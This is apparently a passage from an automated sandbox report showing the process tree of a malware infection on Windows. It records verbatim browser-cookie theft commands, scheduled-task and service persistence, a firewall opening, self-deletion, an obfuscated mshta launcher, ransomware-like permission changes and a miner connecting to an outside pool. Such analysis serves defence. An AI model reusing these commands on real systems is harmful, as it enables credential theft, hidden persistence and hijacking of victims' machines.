                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:5880
                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:5736
                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:5436
                                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Checks whether UAC is enabled
                                                                            • Drops file in Program Files directory
                                                                            PID:2960
                                                                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                            "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:4396
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:4240
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:5172
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              8⤵
                                                                                PID:5500
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                8⤵
                                                                                  PID:876
                                                                            • C:\Users\Admin\Documents\AoIli8mt0N_PN1bmdJEXG2iQ.exe
                                                                              "C:\Users\Admin\Documents\AoIli8mt0N_PN1bmdJEXG2iQ.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:3628
                                                                              • C:\Users\Admin\Documents\AoIli8mt0N_PN1bmdJEXG2iQ.exe
                                                                                "C:\Users\Admin\Documents\AoIli8mt0N_PN1bmdJEXG2iQ.exe"
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Modifies data under HKEY_USERS
                                                                                • Modifies system certificate store
                                                                                PID:5340
                                                                            • C:\Users\Admin\Documents\oqV75kVRavqKJp_nLhsCV7ZA.exe
                                                                              "C:\Users\Admin\Documents\oqV75kVRavqKJp_nLhsCV7ZA.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:4184
                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:5212
                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:5272
                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:5972
                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:6004
                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:4768
                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:5976
                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:4244
                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:6072
                                                                            • C:\Users\Admin\Documents\W_TVTnTgcOvS_iSGNB7mHPPD.exe
                                                                              "C:\Users\Admin\Documents\W_TVTnTgcOvS_iSGNB7mHPPD.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Checks BIOS information in registry
                                                                              • Checks whether UAC is enabled
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:4564
                                                                            • C:\Users\Admin\Documents\RaieqozRg_FTELXfFy5YPx5N.exe
                                                                              "C:\Users\Admin\Documents\RaieqozRg_FTELXfFy5YPx5N.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Checks BIOS information in registry
                                                                              • Checks whether UAC is enabled
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:4544
                                                                            • C:\Users\Admin\Documents\PS5ROzVIv2tiO2ykljvNjW6I.exe
                                                                              "C:\Users\Admin\Documents\PS5ROzVIv2tiO2ykljvNjW6I.exe"
                                                                              6⤵
                                                                                PID:4724
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\PS5ROzVIv2tiO2ykljvNjW6I.exe"
                                                                                  7⤵
                                                                                    PID:5708
                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                      timeout /T 10 /NOBREAK
                                                                                      8⤵
                                                                                      • Delays execution with timeout.exe
                                                                                      PID:6040
                                                                                • C:\Users\Admin\Documents\JMwxgjreQPjWimTLknawn_9v.exe
                                                                                  "C:\Users\Admin\Documents\JMwxgjreQPjWimTLknawn_9v.exe"
                                                                                  6⤵
                                                                                    PID:4652
                                                                                    • C:\Users\Admin\Documents\JMwxgjreQPjWimTLknawn_9v.exe
                                                                                      C:\Users\Admin\Documents\JMwxgjreQPjWimTLknawn_9v.exe
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks processor information in registry
                                                                                      PID:5088
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im JMwxgjreQPjWimTLknawn_9v.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\JMwxgjreQPjWimTLknawn_9v.exe" & del C:\ProgramData\*.dll & exit
                                                                                        8⤵
                                                                                          PID:5568
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /im JMwxgjreQPjWimTLknawn_9v.exe /f
                                                                                            9⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:5668
                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                            timeout /t 6
                                                                                            9⤵
                                                                                            • Delays execution with timeout.exe
                                                                                            PID:2400
                                                                                      • C:\Users\Admin\Documents\JMwxgjreQPjWimTLknawn_9v.exe
                                                                                        C:\Users\Admin\Documents\JMwxgjreQPjWimTLknawn_9v.exe
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5064
                                                                                    • C:\Users\Admin\Documents\Z2d2wpSW5ox7paqyvrpHpb4F.exe
                                                                                      "C:\Users\Admin\Documents\Z2d2wpSW5ox7paqyvrpHpb4F.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops desktop.ini file(s)
                                                                                      PID:1080
                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                        schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                        7⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:3280
                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                        cmd /c attrib +H +S "C:\ProgramData\\Provisioning" & attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                        7⤵
                                                                                          PID:5152
                                                                                          • C:\Windows\system32\attrib.exe
                                                                                            attrib +H +S "C:\ProgramData\\Provisioning"
                                                                                            8⤵
                                                                                            • Views/modifies file attributes
                                                                                            PID:5500
                                                                                          • C:\Windows\system32\attrib.exe
                                                                                            attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                            8⤵
                                                                                            • Views/modifies file attributes
                                                                                            PID:5688
                                                                                        • C:\ProgramData\Provisioning\settings.exe
                                                                                          "C:\ProgramData\Provisioning\settings.exe"
                                                                                          7⤵
                                                                                          • Drops file in Drivers directory
                                                                                          • Executes dropped EXE
                                                                                          • Drops desktop.ini file(s)
                                                                                          PID:4284
                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                            schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                            8⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:5228
                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                            cmd /c attrib +H +S "C:\ProgramData\\Provisioning" & attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                            8⤵
                                                                                              PID:3604
                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                attrib +H +S "C:\ProgramData\\Provisioning"
                                                                                                9⤵
                                                                                                • Views/modifies file attributes
                                                                                                PID:2284
                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                                9⤵
                                                                                                • Views/modifies file attributes
                                                                                                PID:1864
                                                                                        • C:\Users\Admin\Documents\tMj1HxPYnDDUcAkw74Q8fVhi.exe
                                                                                          "C:\Users\Admin\Documents\tMj1HxPYnDDUcAkw74Q8fVhi.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4084
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                      4⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1280
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_6.exe
                                                                                        sonia_6.exe
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:764
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:2304
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1320
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          6⤵
                                                                                            PID:5764
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            6⤵
                                                                                              PID:988
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                          4⤵
                                                                                            PID:3160
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 528
                                                                                            4⤵
                                                                                            • Program crash
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:632
                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                      1⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • Modifies registry class
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:576
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                        2⤵
                                                                                        • Checks processor information in registry
                                                                                        • Modifies registry class
                                                                                        PID:4208
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                        2⤵
                                                                                        • Drops file in System32 directory
                                                                                        • Checks processor information in registry
                                                                                        • Modifies data under HKEY_USERS
                                                                                        • Modifies registry class
                                                                                        PID:392
                                                                                    • C:\Windows\system32\rUNdlL32.eXe
                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                      1⤵
                                                                                      • Process spawned unexpected child process
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1300
                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                        2⤵
                                                                                        • Loads dropped DLL
                                                                                        • Modifies registry class
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4116
                                                                                    • C:\Users\Admin\AppData\Local\Temp\5EC6.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\5EC6.exe
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:960
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4652
                                                                                    • C:\Users\Admin\AppData\Local\Temp\83B4.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\83B4.exe
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:5848
                                                                                      • C:\Users\Admin\AppData\Local\Temp\83B4.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\83B4.exe
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4196
                                                                                      • C:\Users\Admin\AppData\Local\Temp\83B4.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\83B4.exe
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2840
                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                      1⤵
                                                                                      • Process spawned unexpected child process
                                                                                      • Blocklisted process makes network request
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      PID:4724
                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                        2⤵
                                                                                        • Loads dropped DLL
                                                                                        • Modifies registry class
                                                                                        PID:3624
                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                      1⤵
                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                      PID:3080
                                                                                    • C:\Users\Admin\AppData\Local\Temp\D19.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\D19.exe
                                                                                      1⤵
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:5480
                                                                                    • C:\Users\Admin\AppData\Local\Temp\1065.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\1065.exe
                                                                                      1⤵
                                                                                        PID:4784
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\sxhxopml\
                                                                                          2⤵
                                                                                            PID:6044
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\yyvqtkbt.exe" C:\Windows\SysWOW64\sxhxopml\
                                                                                            2⤵
                                                                                              PID:5464
                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                              "C:\Windows\System32\sc.exe" create sxhxopml binPath= "C:\Windows\SysWOW64\sxhxopml\yyvqtkbt.exe /d\"C:\Users\Admin\AppData\Local\Temp\1065.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                              2⤵
                                                                                                PID:6084
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                "C:\Windows\System32\sc.exe" description sxhxopml "wifi internet conection"
                                                                                                2⤵
                                                                                                  PID:5604
                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                  "C:\Windows\System32\sc.exe" start sxhxopml
                                                                                                  2⤵
                                                                                                    PID:6108
                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                    2⤵
                                                                                                      PID:1408
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1577.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\1577.exe
                                                                                                    1⤵
                                                                                                    • Loads dropped DLL
                                                                                                    • Checks processor information in registry
                                                                                                    PID:1748
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im 1577.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1577.exe" & del C:\ProgramData\*.dll & exit
                                                                                                      2⤵
                                                                                                        PID:5976
                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                          taskkill /im 1577.exe /f
                                                                                                          3⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:2468
                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                          timeout /t 6
                                                                                                          3⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:4300
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1AD7.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\1AD7.exe
                                                                                                      1⤵
                                                                                                      • Loads dropped DLL
                                                                                                      PID:4248
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2102.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\2102.exe
                                                                                                      1⤵
                                                                                                        PID:5756
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\24CC.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\24CC.exe
                                                                                                        1⤵
                                                                                                          PID:5124
                                                                                                        • C:\Windows\SysWOW64\sxhxopml\yyvqtkbt.exe
                                                                                                          C:\Windows\SysWOW64\sxhxopml\yyvqtkbt.exe /d"C:\Users\Admin\AppData\Local\Temp\1065.exe"
                                                                                                          1⤵
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:5676
                                                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                                                            svchost.exe
                                                                                                            2⤵
                                                                                                            • Drops file in System32 directory
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:5292
                                                                                                            • C:\Windows\SysWOW64\svchost.exe
                                                                                                              svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                              3⤵
                                                                                                                PID:4812
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\399D.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\399D.exe
                                                                                                            1⤵
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:5172
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3B73.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\3B73.exe
                                                                                                            1⤵
                                                                                                            • Loads dropped DLL
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:5008
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4845.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\4845.exe
                                                                                                            1⤵
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:4828
                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:5044
                                                                                                            • C:\Windows\explorer.exe
                                                                                                              C:\Windows\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:4236
                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:4004
                                                                                                                • C:\Windows\explorer.exe
                                                                                                                  C:\Windows\explorer.exe
                                                                                                                  1⤵
                                                                                                                    PID:5960
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                    1⤵
                                                                                                                      PID:4820
                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                      C:\Windows\explorer.exe
                                                                                                                      1⤵
                                                                                                                        PID:5900
                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                        1⤵
                                                                                                                          PID:3952
                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                          C:\Windows\explorer.exe
                                                                                                                          1⤵
                                                                                                                            PID:5852
                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:1940
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\A56A.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\A56A.exe
                                                                                                                              1⤵
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:5368
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\A56A.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\A56A.exe
                                                                                                                                2⤵
                                                                                                                                • Adds Run key to start application
                                                                                                                                PID:640
                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                  icacls "C:\Users\Admin\AppData\Local\5e228905-709e-4f61-bfde-5f2a5ccbc2ab" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                  3⤵
                                                                                                                                  • Modifies file permissions
                                                                                                                                  PID:4316
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\A56A.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\A56A.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                  3⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:5060
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\A56A.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\A56A.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                    4⤵
                                                                                                                                    • Modifies extensions of user files
                                                                                                                                    PID:6092
                                                                                                                                    • C:\Users\Admin\AppData\Local\33598c5f-ca16-4c4a-86b8-14fada59ed47\build2.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\33598c5f-ca16-4c4a-86b8-14fada59ed47\build2.exe"
                                                                                                                                      5⤵
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:4104
                                                                                                                                      • C:\Users\Admin\AppData\Local\33598c5f-ca16-4c4a-86b8-14fada59ed47\build2.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\33598c5f-ca16-4c4a-86b8-14fada59ed47\build2.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        PID:4804
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\33598c5f-ca16-4c4a-86b8-14fada59ed47\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                          7⤵
                                                                                                                                            PID:4556
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /im build2.exe /f
                                                                                                                                              8⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:4176
                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                              timeout /t 6
                                                                                                                                              8⤵
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:4836
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\A77E.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\A77E.exe
                                                                                                                                1⤵
                                                                                                                                  PID:4532
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5728.bat" "
                                                                                                                                    2⤵
                                                                                                                                      PID:5308
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AA1F.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\AA1F.exe
                                                                                                                                    1⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    PID:5088
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im AA1F.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\AA1F.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                      2⤵
                                                                                                                                        PID:5448
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /im AA1F.exe /f
                                                                                                                                          3⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:2960
                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                          timeout /t 6
                                                                                                                                          3⤵
                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                          PID:4248
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B135.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\B135.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:4084
                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                          "C:\Windows\System32\mshta.exe" Vbscript:CloSE ( CreateoBjeCt ( "wscRiPt.SHELl" ). RuN ( "C:\Windows\system32\cmd.exe /Q /c TypE ""C:\Users\Admin\AppData\Local\Temp\B135.exe"" >..\72OtEAH3UaKAg8.exE && stArt ..\72oTEAH3UaKAG8.Exe /PrNjt~CkLtFO & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\B135.exe"" ) do taskkill -F -Im ""%~nXf"" " , 0 , trUe ) )
                                                                                                                                          2⤵
                                                                                                                                            PID:4908
